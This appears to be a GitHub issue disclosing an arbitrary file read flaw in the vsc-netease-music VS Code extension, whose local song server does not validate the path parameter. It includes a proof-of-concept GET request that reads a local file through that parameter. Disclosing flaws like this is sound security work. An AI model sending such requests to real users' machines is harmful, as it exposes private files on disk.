Open tengattack opened 3 years ago
As vsc-netease-music creates a local server to serve song files, it doesn't check the path param, so we could access arbitrary files on disk.
vsc-netease-music
https://github.com/nondanee/vsc-netease-music/blob/789697495c38b884a0ed0009af0add8a7121d819/runtime.js#L468-L469
GET http://127.0.0.1:16363/song/file?path=file://%2FD%3A%2Ftext.txt
As
vsc-netease-musiccreates a local server to serve song files, it doesn't check the path param, so we could access arbitrary files on disk.https://github.com/nondanee/vsc-netease-music/blob/789697495c38b884a0ed0009af0add8a7121d819/runtime.js#L468-L469
GET http://127.0.0.1:16363/song/file?path=file://%2FD%3A%2Ftext.txt